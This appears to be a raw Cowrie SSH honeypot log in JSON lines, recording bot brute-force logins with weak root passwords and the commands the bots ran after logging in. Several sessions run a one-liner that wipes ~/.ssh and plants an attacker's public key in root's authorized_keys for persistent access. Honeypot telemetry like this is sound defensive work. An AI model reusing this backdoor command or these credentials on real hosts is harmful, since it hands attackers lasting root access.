{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:02:48.260448Z","src_ip":"87.106.35.227","session":"7505fc10ff84"}
{"eventid":"cowrie.login.success","username":"root","password":"jack1234","message":"login attempt [root/jack1234] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:02:48.389574Z","src_ip":"87.106.35.227","session":"7505fc10ff84"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:02:48.518750Z","src_ip":"87.106.35.227","session":"7505fc10ff84"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:02:48.519559Z","src_ip":"87.106.35.227","session":"7505fc10ff84"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:02:48.520827Z","src_ip":"87.106.35.227","session":"7505fc10ff84"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:02:48.545008Z","src_ip":"87.106.35.227","session":"7505fc10ff84"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:02:48.636181Z","src_ip":"87.106.35.227","session":"7505fc10ff84"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T23:02:48.637016Z","src_ip":"87.106.35.227","session":"7505fc10ff84"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T23:02:48.660480Z","src_ip":"87.106.35.227","session":"7505fc10ff84"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:02:48.661456Z","src_ip":"87.106.35.227","session":"7505fc10ff84"}
{"eventid":"cowrie.session.connect","src_ip":"87.106.35.227","src_port":54626,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcbf13d39f1b","protocol":"ssh","message":"New connection: 87.106.35.227:54626 (1.2.3.4:22) [session: dcbf13d39f1b]","sensor":"my-vps","timestamp":"2025-08-24T23:02:48.681590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:02:48.682378Z","src_ip":"87.106.35.227","session":"dcbf13d39f1b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:02:48.703990Z","src_ip":"87.106.35.227","session":"dcbf13d39f1b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T23:02:48.832499Z","src_ip":"87.106.35.227","session":"dcbf13d39f1b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:02:49.857002Z","src_ip":"87.106.35.227","session":"dcbf13d39f1b"}
{"eventid":"cowrie.session.connect","src_ip":"87.106.35.227","src_port":54640,"dst_ip":"1.2.3.4","dst_port":22,"session":"a157246c0c65","protocol":"ssh","message":"New connection: 87.106.35.227:54640 (1.2.3.4:22) [session: a157246c0c65]","sensor":"my-vps","timestamp":"2025-08-24T23:02:49.877561Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:02:49.878581Z","src_ip":"87.106.35.227","session":"a157246c0c65"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:02:49.900163Z","src_ip":"87.106.35.227","session":"a157246c0c65"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:02:50.029122Z","src_ip":"87.106.35.227","session":"a157246c0c65"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:02:50.053092Z","src_ip":"87.106.35.227","session":"7505fc10ff84"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:02:50.053886Z","src_ip":"87.106.35.227","session":"a157246c0c65"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":47184,"dst_ip":"1.2.3.4","dst_port":22,"session":"bedbb0b5a292","protocol":"ssh","message":"New connection: 196.251.115.108:47184 (1.2.3.4:22) [session: bedbb0b5a292]","sensor":"my-vps","timestamp":"2025-08-24T23:02:57.462572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:02:58.128188Z","src_ip":"196.251.115.108","session":"bedbb0b5a292"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:02:58.129222Z","src_ip":"196.251.115.108","session":"bedbb0b5a292"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456789--","message":"login attempt [root/a123456789--] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:03:00.821813Z","src_ip":"107.189.19.100","session":"bca6f270b20e"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"12345","message":"login attempt [oracle/12345] failed","sensor":"my-vps","timestamp":"2025-08-24T23:03:01.045235Z","src_ip":"196.251.115.108","session":"bedbb0b5a292"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:02.284548Z","src_ip":"196.251.115.108","session":"bedbb0b5a292"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:03:06.203184Z","src_ip":"107.189.19.100","session":"bca6f270b20e"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-24T23:03:06.203861Z","src_ip":"107.189.19.100","session":"bca6f270b20e"}
{"eventid":"cowrie.session.connect","src_ip":"181.218.9.86","src_port":38088,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fc79601518b","protocol":"ssh","message":"New connection: 181.218.9.86:38088 (1.2.3.4:22) [session: 7fc79601518b]","sensor":"my-vps","timestamp":"2025-08-24T23:03:06.359990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:03:06.360818Z","src_ip":"181.218.9.86","session":"7fc79601518b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:03:06.615686Z","src_ip":"181.218.9.86","session":"7fc79601518b"}
{"eventid":"cowrie.login.success","username":"root","password":"22222222","message":"login attempt [root/22222222] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:03:07.675558Z","src_ip":"181.218.9.86","session":"7fc79601518b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:03:08.240554Z","src_ip":"181.218.9.86","session":"7fc79601518b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:03:08.241232Z","src_ip":"181.218.9.86","session":"7fc79601518b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:03:08.242107Z","src_ip":"181.218.9.86","session":"7fc79601518b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:08.497847Z","src_ip":"181.218.9.86","session":"7fc79601518b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":false,"duration":"2.3","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:08.500915Z","src_ip":"107.189.19.100","session":"bca6f270b20e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:03:09.026087Z","src_ip":"181.218.9.86","session":"7fc79601518b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T23:03:09.027052Z","src_ip":"181.218.9.86","session":"7fc79601518b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T23:03:09.284290Z","src_ip":"181.218.9.86","session":"7fc79601518b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:09.285185Z","src_ip":"181.218.9.86","session":"7fc79601518b"}
{"eventid":"cowrie.session.connect","src_ip":"181.218.9.86","src_port":50762,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c872a6a1b86","protocol":"ssh","message":"New connection: 181.218.9.86:50762 (1.2.3.4:22) [session: 2c872a6a1b86]","sensor":"my-vps","timestamp":"2025-08-24T23:03:09.533847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:03:09.534952Z","src_ip":"181.218.9.86","session":"2c872a6a1b86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:03:09.779837Z","src_ip":"181.218.9.86","session":"2c872a6a1b86"}
{"eventid":"cowrie.session.closed","duration":"37.6","message":"Connection lost after 37.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:10.428570Z","src_ip":"107.189.19.100","session":"bca6f270b20e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T23:03:10.801335Z","src_ip":"181.218.9.86","session":"2c872a6a1b86"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:12.048049Z","src_ip":"181.218.9.86","session":"2c872a6a1b86"}
{"eventid":"cowrie.session.connect","src_ip":"181.218.9.86","src_port":50770,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f178c210321","protocol":"ssh","message":"New connection: 181.218.9.86:50770 (1.2.3.4:22) [session: 0f178c210321]","sensor":"my-vps","timestamp":"2025-08-24T23:03:12.289943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:03:12.290952Z","src_ip":"181.218.9.86","session":"0f178c210321"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:03:12.535635Z","src_ip":"181.218.9.86","session":"0f178c210321"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:03:13.555676Z","src_ip":"181.218.9.86","session":"0f178c210321"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:03:13.798782Z","src_ip":"181.218.9.86","session":"7fc79601518b"}
